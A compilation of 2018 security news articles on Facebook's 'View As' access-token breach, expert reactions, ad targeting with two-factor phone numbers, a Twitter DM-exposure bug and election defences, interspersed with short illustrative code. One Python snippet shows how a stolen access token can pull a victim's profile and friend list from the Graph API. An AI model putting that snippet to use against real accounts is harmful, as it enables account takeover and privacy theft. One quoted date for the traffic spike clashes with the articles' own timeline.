Facebook chief executive Mark Zuckerberg said engineers discovered the breach on Tuesday, and patched it on Thursday night.

"We don't know if any accounts were actually misused," Zuckerberg said. "We face constant attacks from people who want to take over accounts or steal information around the world."

Facebook reset the 50 million breached accounts, meaning users will need to sign back in using passwords. It also reset "access tokens" for another 40 million accounts as a precautionary measure.

Here is a roundup of the scandals dogging the social media giant.

- Cambridge Analytica -

In Facebook's telling, everything goes back to 2013 when Russian-American researcher Aleksandr Kogan creates a personality prediction test app, "thisisyourdigitallife", which is offered on the social network.

Around 300,000 people download the app, authorising access to information on their profile and also to the data of their Facebook friends.

In 2015 Facebook makes changes to its privacy policy and prevents third-party apps from accessing the data of users' friends without their consent.

The same year the social network discovers Kogan has passed on the information retrieved via his app to the British company Cambridge Analytica (CA), which specialises in the analysis of data and strategic communication.

In 2016 CA is hired by Donald Trump's US presidential campaign.

Facebook says it was assured by CA in 2015 that the data in question had been erased. But it estimates the firm could have had access to the data of up to 87 million users, most in the United States, without their consent, and mined this information to serve the Trump campaign.

Cambridge Analytica, which denies the accusations, has since filed for voluntary bankruptcy in the United States and Britain.

Facebook is accused of having been lax in its protection of user data, slow to intervene and consistently vague on its privacy settings.

In 2011 it signed a consent decree with US consumer protection agency the Federal Trade Commission (FTC) settling charges that it deceived consumers by telling them they could keep their information on Facebook private, and then allowing it to be shared and made public.

In March this year the FTC said it had opened an inquiry into Facebook's privacy practices, including whether the company violated the earlier agreement, which would incur hefty fines.

Beyond the CA scandal, Facebook estimates the data of nearly all its users may have, at some time, been retrieved without their knowledge.

- Political manipulation -

Facebook and sites like Google, Twitter and Tumblr are also accused of having allowed the spread through their networks of "fake news", including to manipulate public opinion ahead of the US election in favour of Trump.

The sites have acknowledged finding on their platforms messages, accounts and pages associated with the Internet Research Agency, a Saint Petersburg operation that is alleged to be a "troll farm" connected to the Russian government.

It is accused of spreading disinformation and propaganda including via postings -- often in the form of sponsored ads that target users based on their personal data -- that could influence opinion, for example over immigration.

According to Facebook, more than 120 million users had seen such content.

Facebook is in particular accused of not having been vigilant enough on monitoring the content and authenticity of pages and political ads that it carries.

It announced this year that it will require that the sponsors of political ads are identified and verified.

Earlier this month, Zuckerberg said Facebook was better prepared to defend against efforts to manipulate the platform to influence elections.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."


Industry Reactions to Facebook Hack
2.10.2018 securityweek
Social

Facebook revealed last week that malicious actors may have obtained access tokens for 50 million accounts after exploiting several bugs related to the “View As” feature and a video uploader introduced last year.

The breach was discovered last week following an investigation triggered by a traffic spike observed on September 16. Facebook says it has patched the vulnerability and there is no evidence that the compromised access tokens have been misused.

The incident, the latest in a series of security and privacy scandals involving the social media giant, could have serious repercussions for Facebook. The company’s stock went down, and it faces probes by government authorities, class action lawsuits, and a fine that could exceed $1.6 billion.

Industry professionals have commented on various aspects of the incident, including GDPR implications, the impact on Facebook and its users, the vulnerabilities exploited by the attackers, and the company’s response.

And the feedback begins...

Jeannie Warner, security manager, WhiteHat Security:

“What the hackers accessed is interesting to me– information about the accounts having to do with user data rather than financial. This really underscores the new value currency of privacy and personally identifiable information, which includes demographics like gender, hometown, name, age (birthdate) and anything else a person has under their ‘About’ tab. After the misuse of personal information by Cambridge Analytica, one starts to speculate that the same information is being harvested for similar militant bot and troll activity online, especially heading toward elections and other significant activities. Sometimes why hackers go in and what is taken can give clues as to who the hackers might be – in this case, I can speculate at a probable nation state or other political group data harvesting operation.

How it was detected is also interesting – user logins increased dramatically last December. Companies looking to assemble evidence of attack or compromise can look at user behavior and traffic patterns changing as evidence of ‘something different’ that requires investigation. The OWASP Top 10 Risks for Web Application Security Risks was updated a month before the traffic pattern was noticed last December 2017, adding a new item: A10 Insufficient Logging and Monitoring. This attack and the length of time it went undetected and verified represents the truth of that rating and inclusion as a major risk.”
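
As a minimal illustration of the kind of traffic-pattern monitoring Warner points to, the sketch below flags an hour whose login count far exceeds a rolling baseline. The window size, threshold and synthetic data are arbitrary example values, not a production detection rule.

```python
# Simple anomaly sketch: alert when an hour's login count exceeds the rolling
# baseline by several standard deviations. Window and sigma are illustrative.
from statistics import mean, stdev

def spike_alerts(hourly_logins, window=24, sigma=3.0):
    alerts = []
    for i in range(window, len(hourly_logins)):
        baseline = hourly_logins[i - window:i]
        mu, sd = mean(baseline), stdev(baseline)
        if sd and hourly_logins[i] > mu + sigma * sd:
            alerts.append((i, hourly_logins[i]))
    return alerts

counts = [1000 + (i % 5) * 10 for i in range(48)] + [4000]  # synthetic spike at the end
print(spike_alerts(counts))  # -> [(48, 4000)]
```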

Rahul Kashyap, CEO, Awake Security:

“The immediate challenge for Facebook is going to be identifying what accounts were touched, compared to which ones were truly compromised. The 50 million number could change as we often have seen with past breaches. But it is quite likely a subset of those were specifically taken over.

What will be revealing is whether there is a pattern to whose accounts were being targeted, and whether that pattern will help reveal the identity of the attackers. Facebook knows what it knows now, but there’s always the possibility that attackers were able to get to more information. The large numbers in this breach could just be a decoy if threat actors were targeting specific individuals.”

Eric Sheridan, chief scientist, WhiteHat Security:

“One of the best proactive strategies in reducing the risk of introducing vulnerabilities in applications is the enumeration and systemic adoption of ‘secure design patterns.’ While they may be unique to each organization and perhaps each application, secure design patterns help solidify those code level patterns that developers must adhere to in order to ward off the introduction of exploitable vulnerabilities.

Facebook looks to have been exploited as a result of a Direct Object Reference, whereby an attacker could modify an ‘id’ parameter in order to access unauthorized user information. In this case, a secure design pattern dictating the use of a façade known to enforce data layer security constraints could be adopted to mitigate such vulnerabilities. The adoption of a secure design pattern is not enough, however. We need automation to help enforce the use of the secure design pattern at scale, which presents its own set of challenges.”
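
A minimal sketch of the façade pattern Sheridan describes, with invented data: every profile read goes through a single gate that enforces an authorization rule, instead of handlers trusting an attacker-controlled id parameter. It is an illustration of the design pattern, not a reconstruction of Facebook's data layer.

```python
# Sketch of a data-access facade that enforces authorization at one choke point,
# mitigating direct object reference abuse of an "id" parameter. Data is invented.
PROFILES = {"u1": {"name": "Alice"}, "u2": {"name": "Bob"}}
FRIENDS = {"u1": {"u2"}, "u2": {"u1"}}

class AuthorizationError(Exception):
    pass

class ProfileFacade:
    """Single gate through which all profile reads must pass."""

    def get_profile(self, requester_id: str, target_id: str) -> dict:
        # Data-layer rule: you may read your own profile or a friend's profile.
        if requester_id != target_id and requester_id not in FRIENDS.get(target_id, set()):
            raise AuthorizationError(f"{requester_id} may not read {target_id}")
        return PROFILES[target_id]

facade = ProfileFacade()
print(facade.get_profile("u1", "u2"))   # allowed: u1 and u2 are friends
# facade.get_profile("u3", "u2")        # would raise AuthorizationError
```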

Dan Pitman, Principal Security Architect, Alert Logic:

“New features increase the risk that vulnerabilities like this can become part of the live application and Facebook are known to implement new features at a high rate, having been acknowledged as the leader in agile web development practices in the past.

This 'continuous delivery' of new features combined with the modular nature of that delivery increases risk that vulnerabilities like this can become part of the live application. Testing all of the myriad combinations of the sometimes hundreds of components, or modules, that can interact is the challenge. The applications are made up of components built by different developers at different times working based on older best practices, all of this means that vulnerabilities are an inevitability. In Facebook’s case there will be people working hard to identify flaws in both trenches and this time the attackers got there first.”

Matthew Maglieri, CISO, Ashley Madison:

“These types of incidents serve as a reminder that no organization is immune to cyber threats. Facebook is at the forefront of web application security and have an incredibly talented team dedicated to protecting the security and privacy of their users.

As a professional who has worked with companies around the world to enhance and build their cybersecurity programs, I would say that we need to learn from incidents like these and not rush to judge companies like Facebook.

And while we must hold each other accountable for these incidents, we also need to help each other up, to avoid belittling our peers who have gone through the worst, and to share what we know so that others can improve. If we don’t, we’ll only be preventing the open and honest dialogue necessary for our collective success.”

Pravin Kothari, CEO, CipherCloud:

“The real $50 million dollar question is who did this impact, exactly? Do any of those 50 million customers impacted reside in the European Community? If so, will this fall under GDPR and how will it be treated? Enforcement of GDPR will come from the Information Commissioner’s Office (ICO). What will their reaction be? Given the horrendous publicity from the Cambridge Analytica data exposures, the EU reaction is not easily predicted. Not knowing all of the detail of when the breach was discovered, who, exactly was impacted, who was responsible, etc., the possible outcomes may be worse than we know today. We’ll have to see what Facebook discloses about potential liability if any exists. The calculations of the potential fines under GDPR are a bit mind-boggling with any possible impact to millions of users.”

Dr. Richard Ford, Chief Scientist, Forcepoint:

“First, I think it’s great that Facebook appears to have reacted so quickly, as it’s a sign of the growing maturity around breach response that we’re starting to see as GDPR comes into effect. Understanding if there was a pattern to the impacted accounts versus just random selection is the difference between someone trying to hack the system for fun or a coordinated nation-state attack that compromises specific users to ultimately gain access to sensitive data.

This breach illustrates a fundamental truth of the new digital economy: when I share my personal data with a company I am putting my trust in your ability to protect that data adequately. Users need to continually evaluate the type of data they share and the potential impact a breach of that data could cause, to become an active participant in protecting their own online identities. On the other side, companies need to avail themselves of proactive technologies such as behavioral analysis to hold up their end of the bargain.”

Greg Foss, senior manager of Threat Research, LogRhythm:

“The view-as feature within Facebook’s platform, while well-intentioned, is difficult to implement programmatically, in that you are viewing your account as another individual – essentially a light version of account impersonation. When implemented properly, you’re given a specific view of an account based on what is programmatically known about the account you’re viewing from.

Based on information available, a video uploading feature implemented in July of last year exposed this feature to a flaw that allowed attackers to impersonate other user accounts and effectively obtain full access to their Facebook profiles. It appears that attackers are able to access the accounts of ‘friends’ or those already connected to the compromised account.

If that’s true, it may be possible to trace the attacks back to a single point of origin, given the nature of how the attack spreads to other accounts. That said, the origin account will most likely not be that of a real Facebook user, so determining an individual or group behind this will take some digging.”

Chester Wisniewski, Principal Research Scientist, Sophos:

“In something as big and complicated as Facebook, there are bound to be bugs. The theft of these authorization tokens is certainly a problem, but not nearly as big a risk to users' privacy as other data breaches we have heard about, or even Cambridge Analytica for that matter.

As with any social media platform, users should assume their information may be made public, through hacking or simply through accidental oversharing. This is why sensitive information should never be shared through these platforms. For now, logging out and back in is all that is necessary. The truly concerned should use this as a reminder and an opportunity to review all of their security and privacy settings on Facebook and all other social media platforms they share personal information with.”

Adam Levin, Founder, CyberScout:

“Facebook has had a hard year, and it just got worse. In a world dominated by trillion-dollar advertising platforms consisting of multi-billion member communities, 50 million users may no longer seem like a big deal, but it is. The number of people affected by this breach is roughly equal to the entire population of the west coast of the United States. Just because you are secure at 9:01 does not mean that will still be the case at 9:02. The latest Facebook breach was caused by an upgrade. The takeaway is simple: Any changes made to networks, software and other systems must be immediately and continually tested and monitored for vulnerabilities that may have been caused in the process. The traditional "patch and pray" approach to cybersecurity is obsolete. An effective vulnerability management program is crucial.”

Satya Gupta, chief technology officer and co-founder of Virsec:

“While the “View As” feature sounds like a useful way to see what your profile looks like to your ex-girlfriend, it was clearly built without thinking through security. Instead of just seeing through someone else’s eyes, Facebook essentially lets you borrow their identity. Armed with someone else’s access token, you can get to lots of private and highly privileged information. In addition, millions of people use their Facebook ID (authenticated through their access tokens) to connect to other services where they might be storing files, making purchases, or doing other things that they thought were private. While Facebook claims not to know what these 50 million access tokens are being used for, you can bet that the thieves have found them to be very valuable.

These problems could easily have been avoided, and services that prioritize security, like banks, hospitals and even airlines, rarely make these basic mistakes. It’s a bad idea to let users stay logged on indefinitely while there is no activity. Many people will open a Facebook browser tab and not close it for hours or days while doing other things. If you’re logged into your banking site and are inactive for more than a few minutes, you are automatically logged off and need to re-authenticate. This is a small burden for users and a no-brainer for security. There are also solutions that provide continuous authentication, requiring users to confirm their identity if there is any unusual behavior.”
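
The idle-timeout practice Gupta describes can be sketched with a minimal server-side check; the five-minute window and the names below are illustrative assumptions, not anything Facebook or Virsec has published.

    from datetime import datetime, timedelta

    # Hypothetical idle-timeout policy: force re-authentication after five idle
    # minutes. Threshold and names are illustrative only.
    IDLE_TIMEOUT = timedelta(minutes=5)

    def session_expired(last_activity, now=None):
        # Return True if the session has been idle longer than the policy allows.
        now = now or datetime.utcnow()
        return now - last_activity > IDLE_TIMEOUT

    # A session last active 12 minutes ago would be logged out under this policy.
    print(session_expired(datetime.utcnow() - timedelta(minutes=12)))  # True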

Dawn Song, CEO, Oasis Labs:

“Today’s breach confirms a critical trend: it’s nearly impossible for major tech companies to protect data with existing technologies. It’s time to start looking at new solutions like blockchain to defend user privacy.”


Several Bugs Exploited in Massive Facebook Hack
1.10.2018 securityaffairs
Social  Vulnerability

Facebook Shares More Details About Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code and use it to access the targeted user’s account. An attacker would first have to target one of their friends’ accounts and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.
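
To see why a stolen token is so powerful, consider a minimal sketch of how any holder of a user access token can query the Graph API for a victim's profile and friend list, which is the kind of access the pivoting built on. The API version and field names are assumptions based on public Graph API documentation, not details confirmed by Facebook.

    import requests

    # Illustrative sketch only: a leaked user access token amounts to
    # account-level API access for whoever holds it.
    GRAPH = "https://graph.facebook.com/v3.1"

    def profile_for(token):
        # Fetch basic profile fields, the way any app holding the token could.
        resp = requests.get(GRAPH + "/me",
                            params={"fields": "id,name,email", "access_token": token})
        return resp.json()

    def friends_for(token):
        # A friend list like this is what let attackers pick the next accounts to target.
        resp = requests.get(GRAPH + "/me/friends", params={"access_token": token})
        return resp.json().get("data", [])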

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after it noticed a traffic spike in the form of increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning on Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability was complex and required a certain skill level.

The company says it has notified the FBI and other law enforcement agencies. While the company responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


Facebook: User shadow data, including phone numbers, may be used by advertisers
29.9.2018 securityaffairs
Social

The worst suspicion has become a disconcerting reality: Facebook admitted that advertisers were able to access phone numbers its users provided for enhanced security.
Researchers from two American universities discovered that phone numbers given to Facebook for two-factor authentication were also used for advertising purposes.

“These findings hold despite all the relevant privacy controls on our test accounts being set to their most private settings,” reads the study published by the researchers.

“Most worrisome, we found that phone numbers uploaded as part of syncing contacts — that were never owned by a user and never listed on their account – were in fact used to enable PII-based advertising,”

The study investigates the channels through which advertisers can gather personally identifying information (PII) from Facebook, WhatsApp and Messenger services.

Contact lists uploaded to Facebook’s platforms could be mined by advertisers, who can extract the personal information they contain and leverage it to target people in the uploaders’ networks.

The experts speculate Facebook is using a hidden layer of details it has about its users, such as phone numbers supplied for two-factor authentication, which they call “shadow contact information.”

The study supported concerns that Facebook makes money on advertising by using “shadow” sources of data that users never gave to the social network for that purpose.

“We use the information people provide to offer a better, more personalized experience on Facebook, including showing more relevant ads,” a spokeswoman told Gizmodo, which first reported the news.

Facebook continues to face a severe crisis over the way it manages its users’ data; the Cambridge Analytica case shocked the world by revealing how the social network giant shared the information of unaware users with third-party companies.

At the time of writing, Facebook’s Guy Rosen, VP of Product Management, announced that attackers exploited a vulnerability in the “View As” feature to steal the Facebook access tokens of 50 million users.


Facebook hacked – 50 Million Users’ Data exposed in the security breach
29.9.2018 securityaffairs
Social

Facebook hacked – Attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of 50 Million Users.
Facebook has been hacked, and the news is rapidly spreading across the Internet. A few hours ago, Facebook announced that an attack on its computer network exposed the personal information of roughly 50 million users.

The social network giant discovered the security breach this week; the attackers exploited a bug in the “View As” feature to steal users’ access tokens and take over their accounts.

Facebook has identified and already fixed the flaw exploited in the attack; it immediately launched an investigation and reported the incident to law enforcement.

In a blog post, Facebook’s Guy Rosen, VP of Product Management explained that the attackers exploited a vulnerability associated with Facebook’s “View As” feature that allowed them to steal Facebook access tokens. These tokens could then be used to take over people’s accounts.

“On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts.” stated Guy Rosen, Facebook VP of Product Management.

“Our investigation is still in its early stages. But it’s clear that attackers exploited a vulnerability in Facebook’s code that impacted “View As”, a feature that lets people see what their own profile looks like to someone else. This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts.”

Facebook disabled the “View As” feature in response to the incident, reset the security tokens for the 50 million impacted accounts and, as a precautionary measure, reset them for another 40 million accounts.

“Second, we have reset the access tokens of the almost 50 million accounts we know were affected to protect their security. We’re also taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year. As a result, around 90 million people will now have to log back in to Facebook, or any of their apps that use Facebook Login. After they have logged back in, people will get a notification at the top of their News Feed explaining what happened.” continues Guy Rosen.

“Third, we’re temporarily turning off the “View As” feature while we conduct a thorough security review.”

Facebook revealed that the bug exploited by the attackers was introduced with a change to their video uploading feature made in July 2017.

The tech giant said it did not know the source of the attack or identity of the attackers.

“We’re taking it really seriously,” Mark Zuckerberg, the company’s chief executive, said in a conference call with reporters. “We have a major security effort at the company that hardens all of our surfaces.” He added: “I’m glad we found this. But it definitely is an issue that this happened in the first place.”

The company will provide more information once the investigation is completed.


Facebook Admits Phone Numbers May be Used to Target Ads
28.9.2018 securityweek
Social

Facebook on Thursday confirmed that advertisers were privy to phone numbers given by members of the social network for enhanced security.

A study by two US universities, first reported by news website Gizmodo, found that phone numbers given to Facebook for two-factor authentication were also used to target advertising.

Two-factor authentication is intended to enhance security by requiring a second step, such as entering codes sent via text messages, as well as passwords to get into accounts.

Phone numbers added to profiles, for security purposes, or for messaging were potential fodder for advertisers, according to the study.

"These findings hold despite all the relevant privacy controls on our test accounts being set to their most private settings," researchers said in the study, which looked at ways advertisers can get personally identifying information (PII) from Facebook or its WhatsApp and Messenger services.

Contact lists uploaded to Facebook platforms could be mined for personal information, meaning that people could unintentionally help advertisers target their friends.

"Most worrisome, we found that phone numbers uploaded as part of syncing contacts -- that were never owned by a user and never listed on their account - were in fact used to enable PII-based advertising," researchers said in the study.

The study supported concerns that Facebook makes money on advertising by using "shadow" sources of data that users never gave to the social network for that purpose.

"We use the information people provide to offer a better, more personalized experience on Facebook, including ads," a spokeswoman said in response to an AFP inquiry about the study findings.

"We are clear about how we use the information we collect, including the contact information that people upload or add to their own accounts."

Facebook is grappling with the worst crisis in its history, vilified for not more zealously guarding the information that users share.

The Silicon Valley-based internet colossus faced intense global scrutiny over the mass harvesting of personal data by Cambridge Analytica, a British political consultancy that worked for Donald Trump's 2016 election campaign.

The company has admitted up to 87 million users may have had their data hijacked in the scandal.


Bug Exposed Direct Messages of Millions of Twitter Users
24.9.2018 securityweek
Social

Millions of Twitter Users Affected by Information Exposure Flaw

Twitter has patched a bug that may have caused direct messages to be sent to third-party developers other than the ones users interacted with. The problem existed for well over a year and it impacted millions of users.

According to Twitter, the issue is related to the Account Activity API (AAAPI), which allows developers registered on the social network’s developer program to build tools designed to better support businesses and their customer communications on the platform.

Users who between May 2017 and September 10, 2018, interacted with an account or business on Twitter that relied on a developer using the AAAPI may have had their messages sent to a different registered developer.

“In some cases this may have included certain Direct Messages or protected Tweets, for example a Direct Message with an airline that had authorized an AAAPI developer. Similarly, if your business authorized a developer using the AAAPI to access your account, the bug may have impacted your activity data in error,” Twitter said.

Twitter determined that less than 1% of users are impacted, but that still represents roughly 3 million accounts – Twitter reported having 335 million active users in the second quarter of 2018. Affected users are being notified by the company, which has also reached out to developers who may have received messages in error to ensure that the information is deleted.

While this may seem like a serious issue, Twitter claims that a specific set of technical circumstances is required to trigger the bug. This includes two or more registered developers having AAAPI subscriptions for domains on the same public IP, matching URL paths (e.g., example.com/webhooks/twitter and anotherexample.com/webhooks/twitter), activity from both developers within the same 6-minute timeframe, and subscriber activity originating from the same Twitter backend server.
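
The coincidence of conditions Twitter describes can be made concrete with a simple check over two hypothetical webhook registrations; this is not Twitter's code, only an illustration of the reported trigger conditions.

    from datetime import timedelta

    # Hypothetical records of two developers' AAAPI webhook registrations.
    def could_collide(reg_a, reg_b, activity_gap, same_backend_server):
        return (reg_a["public_ip"] == reg_b["public_ip"]      # same public IP
                and reg_a["url_path"] == reg_b["url_path"]    # matching URL path
                and activity_gap <= timedelta(minutes=6)      # activity within 6 minutes
                and same_backend_server)                      # same Twitter backend server

    print(could_collide({"public_ip": "203.0.113.7", "url_path": "/webhooks/twitter"},
                        {"public_ip": "203.0.113.7", "url_path": "/webhooks/twitter"},
                        timedelta(minutes=3), True))          # True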

“Our team has been working diligently with our most active enterprise data customers and partners who have access to this API to evaluate if they were impacted. Through our work so far, and the information made available to us by our partners, we can confirm that the bug did not affect any of the partners or customers with whom we have completed our review,” Twitter said on Friday.


Facebook Boosts Protections for Political Candidates
22.9.2018 securityweek
Social

Facebook this week revealed new tools aimed at defending users associated with US political campaigns ahead of the 2018 midterm elections.

The social platform, which has taken various steps towards protecting elections from abuse and exploitation on its platform, including the takedown of fake pages and accounts involved in political influence campaigns, is now launching new tools to defend candidates and campaign staff.

Both hackers and foreign adversaries might be particularly interested in targeting Facebook users who are associated with political campaigns, Facebook says.

The social network already has in place a series of security tools and procedures to stay ahead of bad actors who attempt to use Facebook to disrupt elections, and a newly announced pilot program is meant to complement those.

The new pilot program is open for candidates for federal or statewide office, as well as for staff members and representatives from federal and state political party committees, Facebook announced. The additional security protections can be added both to Pages and to accounts.

To apply for the program, Page admins should head to politics.fb.com/campaignsecurity. Once enrolled, they will be able to add others from their campaign or committee.

“We’ll help officials adopt our strongest account security protections, like two-factor authentication, and monitor for potential hacking threats,” Facebook says.

The program, the social platform claims, can help it detect any targeting that does happen, while also allowing candidates to quickly report such abuses. Once an attack against one campaign official has been detected, the platform can review and protect other enrolled accounts that are affiliated with that same campaign.

Facebook also says it shares relevant information with law enforcement and other companies to increase effectiveness. Additionally, the social network is assessing how the pilot program and other security tools “might be expanded to future elections and other users, such as government officials.”

“Although this is a pilot program, it’s one of several steps we’re taking ahead of the US midterm elections to better secure Facebook, including detecting and removing fake accounts, working to prevent the spread of false news, and setting a new standard for political and issue ads transparency,” the platform concludes.


Facebook Building a 'War Room' to Battle Election Meddling
22.9.2018 securityweek
Social

Facebook on Wednesday said it will have a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections.

"We are setting up a war room in Menlo Park for the Brazil and US elections," Facebook elections and civic engagement director Samidh Chakrabarti said during a conference call.

"It is going to serve as a command center so we can make real-time decisions as needed."

He declined to say when the "war room" -- currently a conference room with a paper sign taped to the door -- would be in operation.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

"Preventing election interference on Facebook has been one of the biggest cross-team efforts the company has seen," Chakrabarti said.

The conference call was the latest briefing by Facebook regarding efforts to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election that brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said last week in a post on the social network.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

- 'Better prepared' for attacks -

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."

Zuckerberg repeated his admission that Facebook was ill-prepared for the vast influence efforts on social media in the 2016 US election but added that "today, Facebook is better prepared for these kinds of attacks."

Facebook has started showing who is behind election-related online ads and has shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to Chakrabarti.

"We are working hard to amplify the good and mitigate the bad," news feed director Greg Marra said on the call.

As elections near, Facebook will also encourage civic involvement and voter registration, according to global politics and government outreach director Katie Harbath.

Facebook has partnered with non-profit organizations to bolster election integrity efforts outside the US and has been meeting with other technology companies to coordinate sharing information about election meddling efforts spanning social media platforms, according to Harbath.

Facebook said it has also started working with political campaigns to improve staff online security practices, such as requiring more than just a password to access an account.


Facebook Offers Rewards for Access Token Exposure Flaws
18.9.2018 securityweek
Social

Facebook announced on Monday that it has expanded its bug bounty program to introduce rewards for reports describing vulnerabilities that involve the exposure of user access tokens.

Access tokens allow users to log into third-party applications and websites through Facebook. The tokens are unique for each user and each app, and users can choose what information can be accessed by the token and the app using it, as well as what actions it can take. The problem is that if a token is exposed, it can be misused to an extent that depends on the permissions set by its owner.

Facebook has updated its bug bounty program to clarify what it expects from reports describing token-related vulnerabilities.

In order to qualify for a bug bounty – Facebook is offering a minimum of $500 per vulnerability – researchers have to submit a clear proof-of-concept (PoC) demonstrating a flaw that allows access to or misuse of tokens.

One very important condition, according to the company, is that the bug needs to be discovered by passively viewing data sent to or from a device while the affected application is in use.

“You are not permitted to manipulate any request sent to the app or website from your device, or otherwise interfere with the ordinary functioning of the app or website in connection with submitting your report. For example, SQLi, XSS, open redirect, or permission-bypass vulnerabilities (such as IDOR) are strictly out of scope,” explained Dan Gurfinkel, Security Engineering Manager at Facebook.
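
In practice, the permitted passive observation amounts to inspecting traffic captured from your own device for token material without altering any request. A hedged sketch, using a generic OAuth-style pattern rather than any Facebook-specific token format, might look like this:

    import re

    # Scan captured traffic for OAuth-style token parameters without modifying
    # any request. The pattern is generic and purely illustrative.
    TOKEN_PATTERN = re.compile(r"access_token=([A-Za-z0-9._-]+)")

    def find_exposed_tokens(captured_text):
        # Return token-looking values seen in the captured requests/responses.
        return TOKEN_PATTERN.findall(captured_text)

    sample = "GET /v3.1/me?fields=name&access_token=EXAMPLE_TOKEN_VALUE HTTP/1.1"
    print(find_exposed_tokens(sample))  # ['EXAMPLE_TOKEN_VALUE']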

The social media giant will inform the developer of the impacted app or website and work with them to address the issue. Apps that fail to promptly comply will be suspended from the platform until the problem has been resolved and a security review is conducted. Facebook says it will also automatically revoke tokens that may have been compromised.

Facebook has taken significant steps to improve security and privacy following the Cambridge Analytica scandal, in which the personal details of a significant number of users were harvested. The company announced in March that it had made a series of changes to its developer platform to implement tighter user privacy controls and limit how apps can access user data. It later announced rewards for users who report misuse of private information.

According to Facebook, in 2017 it paid out $880,000 in bug bounties, with a total of over $6.3 million since the launch of its program in 2011.


Facebook Chief Says Internet Firms in 'Arms Race' for Democracy
5.9.2018 securityweek 
Social

Facebook chief Mark Zuckerberg said late Tuesday that the leading social network and other internet firms are in an arms race to defend democracy.

Zuckerberg's Washington Post op-ed came on the eve of hearings during which lawmakers are expected to grill top executives from Facebook and Twitter.

Google's potential participation is unclear.

The hearings come with online firms facing intense scrutiny for allowing the propagation of misinformation and hate speech, and amid allegations of political bias from the president and his allies.

"Companies such as Facebook face sophisticated, well-funded adversaries who are getting smarter over time, too," Zuckerberg said in an op-ed piece outlining progress being made on the front by the leading social network.

"It's an arms race, and it will take the combined forces of the US private and public sectors to protect America's democracy from outside interference."

After days of vitriol from President Donald Trump, big Silicon Valley firms face lawmakers with a chance to burnish their image -- or face a fresh bashing.

Twitter chief executive Jack Dorsey and Facebook chief operating officer Sheryl Sandberg were set to appear at a Senate Intelligence Committee hearing on Wednesday.

Lawmakers were seeking a top executive from Google or its parent Alphabet, but it remained unclear if the search giant would be represented.

